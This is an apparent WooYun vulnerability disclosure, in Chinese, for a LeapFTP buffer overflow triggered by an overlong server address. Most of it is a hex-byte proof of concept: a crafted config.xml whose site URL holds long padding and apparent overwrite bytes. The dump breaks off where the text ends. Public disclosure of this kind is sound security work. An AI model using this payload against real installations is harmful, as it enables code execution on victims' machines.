当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-021185

漏洞标题:leapftp缓冲区溢出代码执行漏洞

相关厂商:LeapWare

漏洞作者: cssembly

提交时间:2013-04-03 11:52

修复时间:2013-07-02 11:53

公开时间:2013-07-02 11:53

漏洞类型:远程代码执行

危害等级:高

自评Rank:12

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-04-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-07-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

leapftp设计缺陷,存在溢出漏洞

详细说明:

由于未对服务器地址做有效性验证,当输入恶意地址链接时,导致代码执行漏洞

漏洞证明:

修改config.xml内容为如下数据:
0x3C, 0x6B, 0x65, 0x65, 0x70, 0x61, 0x6C, 0x69,
0x76, 0x65, 0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x63,
0x6D, 0x64, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D,
0x22, 0x4C, 0x49, 0x53, 0x54, 0x22, 0x20, 0x2F,
0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x63, 0x6D, 0x64,
0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x4E,
0x4F, 0x4F, 0x50, 0x22, 0x20, 0x2F, 0x3E, 0x0D,
0x0A, 0x09, 0x3C, 0x63, 0x6D, 0x64, 0x20, 0x6E,
0x61, 0x6D, 0x65, 0x3D, 0x22, 0x50, 0x57, 0x44,
0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x3C,
0x63, 0x6D, 0x64, 0x20, 0x6E, 0x61, 0x6D, 0x65,
0x3D, 0x22, 0x52, 0x45, 0x53, 0x54, 0x20, 0x30,
0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x3C, 0x2F,
0x6B, 0x65, 0x65, 0x70, 0x61, 0x6C, 0x69, 0x76,
0x65, 0x3E, 0x0D, 0x0A, 0x3C, 0x74, 0x72, 0x61,
0x6E, 0x73, 0x66, 0x65, 0x72, 0x3E, 0x0D, 0x0A,
0x09, 0x3C, 0x61, 0x73, 0x63, 0x69, 0x69, 0x3E,
0x0D, 0x0A, 0x09, 0x09, 0x3C, 0x66, 0x69, 0x6C,
0x65, 0x20, 0x6D, 0x61, 0x73, 0x6B, 0x3D, 0x22,
0x2A, 0x2E, 0x61, 0x73, 0x63, 0x22, 0x20, 0x2F,
0x3E, 0x0D, 0x0A, 0x09, 0x09, 0x3C, 0x66, 0x69,
0x6C, 0x65, 0x20, 0x6D, 0x61, 0x73, 0x6B, 0x3D,
0x22, 0x2A, 0x2E, 0x62, 0x61, 0x74, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x09, 0x3C, 0x66,
0x69, 0x6C, 0x65, 0x20, 0x6D, 0x61, 0x73, 0x6B,
0x3D, 0x22, 0x2A, 0x2E, 0x63, 0x22, 0x20, 0x2F,
0x3E, 0x0D, 0x0A, 0x09, 0x09, 0x3C, 0x66, 0x69,
0x6C, 0x65, 0x20, 0x6D, 0x61, 0x73, 0x6B, 0x3D,
0x22, 0x2A, 0x2E, 0x63, 0x70, 0x70, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x09, 0x3C, 0x66,
0x69, 0x6C, 0x65, 0x20, 0x6D, 0x61, 0x73, 0x6B,
0x3D, 0x22, 0x2A, 0x2E, 0x63, 0x73, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x09, 0x3C, 0x66,
0x69, 0x6C, 0x65, 0x20, 0x6D, 0x61, 0x73, 0x6B,
0x3D, 0x22, 0x2A, 0x2E, 0x64, 0x68, 0x74, 0x6D,
0x2A, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09,
0x09, 0x3C, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x6D,
0x61, 0x73, 0x6B, 0x3D, 0x22, 0x2A, 0x2E, 0x64,
0x69, 0x7A, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A,
0x09, 0x09, 0x3C, 0x66, 0x69, 0x6C, 0x65, 0x20,
0x6D, 0x61, 0x73, 0x6B, 0x3D, 0x22, 0x2A, 0x2E,
0x64, 0x70, 0x72, 0x22, 0x20, 0x2F, 0x3E, 0x0D,
0x0A, 0x09, 0x09, 0x3C, 0x66, 0x69, 0x6C, 0x65,
0x20, 0x6D, 0x61, 0x73, 0x6B, 0x3D, 0x22, 0x2A,
0x2E, 0x68, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A,
0x09, 0x09, 0x3C, 0x66, 0x69, 0x6C, 0x65, 0x20,
0x6D, 0x61, 0x73, 0x6B, 0x3D, 0x22, 0x2A, 0x2E,
0x68, 0x70, 0x70, 0x22, 0x20, 0x2F, 0x3E, 0x0D,
0x0A, 0x09, 0x09, 0x3C, 0x66, 0x69, 0x6C, 0x65,
0x20, 0x6D, 0x61, 0x73, 0x6B, 0x3D, 0x22, 0x2A,
0x2E, 0x68, 0x74, 0x6D, 0x2A, 0x22, 0x20, 0x2F,
0x3E, 0x0D, 0x0A, 0x09, 0x09, 0x3C, 0x66, 0x69,
0x6C, 0x65, 0x20, 0x6D, 0x61, 0x73, 0x6B, 0x3D,
0x22, 0x2A, 0x2E, 0x69, 0x6E, 0x69, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x09, 0x3C, 0x66,
0x69, 0x6C, 0x65, 0x20, 0x6D, 0x61, 0x73, 0x6B,
0x3D, 0x22, 0x2A, 0x2E, 0x6A, 0x61, 0x76, 0x2A,
0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x09,
0x3C, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x6D, 0x61,
0x73, 0x6B, 0x3D, 0x22, 0x2A, 0x2E, 0x6C, 0x6F,
0x67, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09,
0x09, 0x3C, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x6D,
0x61, 0x73, 0x6B, 0x3D, 0x22, 0x2A, 0x2E, 0x6D,
0x33, 0x75, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A,
0x09, 0x09, 0x3C, 0x66, 0x69, 0x6C, 0x65, 0x20,
0x6D, 0x61, 0x73, 0x6B, 0x3D, 0x22, 0x2A, 0x2E,
0x6E, 0x66, 0x6F, 0x22, 0x20, 0x2F, 0x3E, 0x0D,
0x0A, 0x09, 0x09, 0x3C, 0x66, 0x69, 0x6C, 0x65,
0x20, 0x6D, 0x61, 0x73, 0x6B, 0x3D, 0x22, 0x2A,
0x2E, 0x70, 0x61, 0x73, 0x22, 0x20, 0x2F, 0x3E,
0x0D, 0x0A, 0x09, 0x09, 0x3C, 0x66, 0x69, 0x6C,
0x65, 0x20, 0x6D, 0x61, 0x73, 0x6B, 0x3D, 0x22,
0x2A, 0x2E, 0x70, 0x68, 0x70, 0x22, 0x20, 0x2F,
0x3E, 0x0D, 0x0A, 0x09, 0x09, 0x3C, 0x66, 0x69,
0x6C, 0x65, 0x20, 0x6D, 0x61, 0x73, 0x6B, 0x3D,
0x22, 0x2A, 0x2E, 0x73, 0x66, 0x76, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x09, 0x3C, 0x66,
0x69, 0x6C, 0x65, 0x20, 0x6D, 0x61, 0x73, 0x6B,
0x3D, 0x22, 0x2A, 0x2E, 0x73, 0x71, 0x6C, 0x22,
0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x09, 0x3C,
0x66, 0x69, 0x6C, 0x65, 0x20, 0x6D, 0x61, 0x73,
0x6B, 0x3D, 0x22, 0x2A, 0x2E, 0x74, 0x78, 0x74,
0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x09,
0x3C, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x6D, 0x61,
0x73, 0x6B, 0x3D, 0x22, 0x2A, 0x2E, 0x78, 0x6D,
0x6C, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09,
0x09, 0x3C, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x6D,
0x61, 0x73, 0x6B, 0x3D, 0x22, 0x6D, 0x61, 0x6B,
0x65, 0x66, 0x69, 0x6C, 0x65, 0x22, 0x20, 0x2F,
0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x2F, 0x61, 0x73,
0x63, 0x69, 0x69, 0x3E, 0x0D, 0x0A, 0x09, 0x3C,
0x70, 0x72, 0x69, 0x6F, 0x72, 0x69, 0x74, 0x79,
0x3E, 0x0D, 0x0A, 0x09, 0x09, 0x3C, 0x66, 0x69,
0x6C, 0x65, 0x20, 0x6D, 0x61, 0x73, 0x6B, 0x3D,
0x22, 0x2A, 0x2E, 0x64, 0x69, 0x7A, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x09, 0x3C, 0x66,
0x69, 0x6C, 0x65, 0x20, 0x6D, 0x61, 0x73, 0x6B,
0x3D, 0x22, 0x2A, 0x2E, 0x6D, 0x33, 0x75, 0x22,
0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x09, 0x3C,
0x66, 0x69, 0x6C, 0x65, 0x20, 0x6D, 0x61, 0x73,
0x6B, 0x3D, 0x22, 0x2A, 0x2E, 0x6E, 0x66, 0x6F,
0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x09,
0x3C, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x6D, 0x61,
0x73, 0x6B, 0x3D, 0x22, 0x2A, 0x2E, 0x73, 0x66,
0x76, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09,
0x3C, 0x2F, 0x70, 0x72, 0x69, 0x6F, 0x72, 0x69,
0x74, 0x79, 0x3E, 0x0D, 0x0A, 0x3C, 0x2F, 0x74,
0x72, 0x61, 0x6E, 0x73, 0x66, 0x65, 0x72, 0x3E,
0x0D, 0x0A, 0x3C, 0x72, 0x65, 0x63, 0x65, 0x6E,
0x74, 0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x73, 0x69,
0x74, 0x65, 0x20, 0x75, 0x72, 0x6C, 0x3D, 0x22,
0x66, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x31, 0x32,
0x37, 0x2E, 0x30, 0x2E, 0x30, 0x2E, 0x31, 0x5C,
0x41, 0x42, 0x42, 0x42, 0x42, 0x42, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x74, 0x8E, 0x41, 0x41, 0x67,
0x6A, 0x51, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A,
0x3C, 0x2F, 0x72, 0x65, 0x63, 0x65, 0x6E, 0x74,
0x3E, 0x0D, 0x0A, 0x3C, 0x73, 0x65, 0x73, 0x73,
0x69, 0x6F, 0x6E, 0x3E, 0x0D, 0x0A, 0x09, 0x3C,
0x6C, 0x61, 0x79, 0x6F, 0x75, 0x74, 0x20, 0x6E,
0x61, 0x6D, 0x65, 0x3D, 0x22, 0x77, 0x69, 0x6E,
0x64, 0x6F, 0x77, 0x70, 0x6F, 0x73, 0x22, 0x20,
0x76, 0x61, 0x6C, 0x75, 0x65, 0x3D, 0x22, 0x36,
0x34, 0x2C, 0x31, 0x35, 0x39, 0x2C, 0x34, 0x39,
0x36, 0x2C, 0x39, 0x36, 0x34, 0x22, 0x20, 0x2F,
0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61, 0x79,
0x6F, 0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D, 0x65,
0x3D, 0x22, 0x6F, 0x70, 0x74, 0x69, 0x6F, 0x6E,
0x73, 0x22, 0x20, 0x76, 0x61, 0x6C, 0x75, 0x65,
0x3D, 0x22, 0x30, 0x30, 0x31, 0x31, 0x33, 0x31,
0x31, 0x30, 0x31, 0x30, 0x31, 0x30, 0x31, 0x30,
0x30, 0x30, 0x30, 0x31, 0x22, 0x20, 0x2F, 0x3E,
0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61, 0x79, 0x6F,
0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D,
0x22, 0x6C, 0x6F, 0x63, 0x61, 0x6C, 0x63, 0x6F,
0x6C, 0x75, 0x6D, 0x6E, 0x73, 0x22, 0x20, 0x76,
0x61, 0x6C, 0x75, 0x65, 0x3D, 0x22, 0x31, 0x31,
0x31, 0x31, 0x31, 0x31, 0x31, 0x22, 0x20, 0x2F,
0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61, 0x79,
0x6F, 0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D, 0x65,
0x3D, 0x22, 0x6C, 0x6F, 0x63, 0x61, 0x6C, 0x66,
0x69, 0x6C, 0x74, 0x65, 0x72, 0x22, 0x20, 0x76,
0x61, 0x6C, 0x75, 0x65, 0x3D, 0x22, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61,
0x79, 0x6F, 0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D,
0x65, 0x3D, 0x22, 0x71, 0x75, 0x65, 0x75, 0x65,
0x63, 0x6F, 0x6C, 0x73, 0x22, 0x20, 0x76, 0x61,
0x6C, 0x75, 0x65, 0x3D, 0x22, 0x38, 0x30, 0x2C,
0x38, 0x30, 0x2C, 0x31, 0x30, 0x30, 0x2C, 0x31,
0x35, 0x30, 0x2C, 0x31, 0x35, 0x30, 0x2C, 0x39,
0x30, 0x2C, 0x38, 0x30, 0x2C, 0x38, 0x30, 0x2C,
0x38, 0x30, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A,
0x09, 0x3C, 0x6C, 0x61, 0x79, 0x6F, 0x75, 0x74,
0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x73,
0x63, 0x68, 0x65, 0x64, 0x75, 0x6C, 0x65, 0x63,
0x6F, 0x6C, 0x73, 0x22, 0x20, 0x76, 0x61, 0x6C,
0x75, 0x65, 0x3D, 0x22, 0x31, 0x30, 0x30, 0x2C,
0x31, 0x30, 0x30, 0x2C, 0x31, 0x35, 0x30, 0x2C,
0x31, 0x35, 0x30, 0x2C, 0x31, 0x33, 0x30, 0x2C,
0x31, 0x33, 0x30, 0x2C, 0x39, 0x35, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61,
0x79, 0x6F, 0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D,
0x65, 0x3D, 0x22, 0x72, 0x65, 0x6D, 0x6F, 0x74,
0x65, 0x63, 0x6F, 0x6C, 0x75, 0x6D, 0x6E, 0x73,
0x22, 0x20, 0x76, 0x61, 0x6C, 0x75, 0x65, 0x3D,
0x22, 0x31, 0x31, 0x31, 0x30, 0x30, 0x30, 0x22,
0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x6C,
0x61, 0x79, 0x6F, 0x75, 0x74, 0x20, 0x6E, 0x61,
0x6D, 0x65, 0x3D, 0x22, 0x68, 0x69, 0x73, 0x74,
0x6F, 0x72, 0x79, 0x63, 0x6F, 0x6C, 0x73, 0x22,
0x20, 0x76, 0x61, 0x6C, 0x75, 0x65, 0x3D, 0x22,
0x31, 0x35, 0x30, 0x2C, 0x33, 0x35, 0x30, 0x2C,
0x36, 0x30, 0x2C, 0x31, 0x34, 0x30, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61,
0x79, 0x6F, 0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D,
0x65, 0x3D, 0x22, 0x75, 0x72, 0x6C, 0x63, 0x6F,
0x6C, 0x73, 0x22, 0x20, 0x76, 0x61, 0x6C, 0x75,
0x65, 0x3D, 0x22, 0x36, 0x30, 0x30, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61,
0x79, 0x6F, 0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D,
0x65, 0x3D, 0x22, 0x6C, 0x6F, 0x67, 0x63, 0x6F,
0x6C, 0x73, 0x22, 0x20, 0x76, 0x61, 0x6C, 0x75,
0x65, 0x3D, 0x22, 0x31, 0x35, 0x30, 0x2C, 0x38,
0x30, 0x2C, 0x31, 0x32, 0x30, 0x2C, 0x31, 0x36,
0x30, 0x2C, 0x31, 0x36, 0x30, 0x2C, 0x31, 0x35,
0x30, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09,
0x3C, 0x6C, 0x61, 0x79, 0x6F, 0x75, 0x74, 0x20,
0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x71, 0x75,
0x65, 0x75, 0x65, 0x68, 0x65, 0x69, 0x67, 0x68,
0x74, 0x22, 0x20, 0x76, 0x61, 0x6C, 0x75, 0x65,
0x3D, 0x22, 0x31, 0x35, 0x30, 0x22, 0x20, 0x2F,
0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61, 0x79,
0x6F, 0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D, 0x65,
0x3D, 0x22, 0x6C, 0x6F, 0x67, 0x77, 0x69, 0x64,
0x74, 0x68, 0x22, 0x20, 0x76, 0x61, 0x6C, 0x75,
0x65, 0x3D, 0x22, 0x31, 0x30, 0x30, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61,
0x79, 0x6F, 0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D,
0x65, 0x3D, 0x22, 0x70, 0x72, 0x65, 0x66, 0x70,
0x61, 0x67, 0x65, 0x22, 0x20, 0x76, 0x61, 0x6C,
0x75, 0x65, 0x3D, 0x22, 0x30, 0x22, 0x20, 0x2F,
0x3E, 0x0D, 0x0A, 0x09, 0x3C, 0x6C, 0x61, 0x79,
0x6F, 0x75, 0x74, 0x20, 0x6E, 0x61, 0x6D, 0x65,
0x3D, 0x22, 0x74, 0x72, 0x61, 0x6E, 0x73, 0x66,
0x65, 0x72, 0x6D, 0x6F, 0x64, 0x65, 0x22, 0x20,
0x76, 0x61, 0x6C, 0x75, 0x65, 0x3D, 0x22, 0x30,
0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0A, 0x09, 0x3C,
0x6C, 0x61, 0x79, 0x6F, 0x75, 0x74, 0x20, 0x6E,
0x61, 0x6D, 0x65, 0x3D, 0x22, 0x63, 0x6F, 0x6D,
0x70, 0x6C, 0x65, 0x74, 0x65, 0x6D, 0x6F, 0x64,
0x65, 0x22, 0x20, 0x76, 0x61, 0x6C, 0x75, 0x65,
0x3D, 0x22, 0x30, 0x22, 0x20, 0x2F, 0x3E, 0x0D,
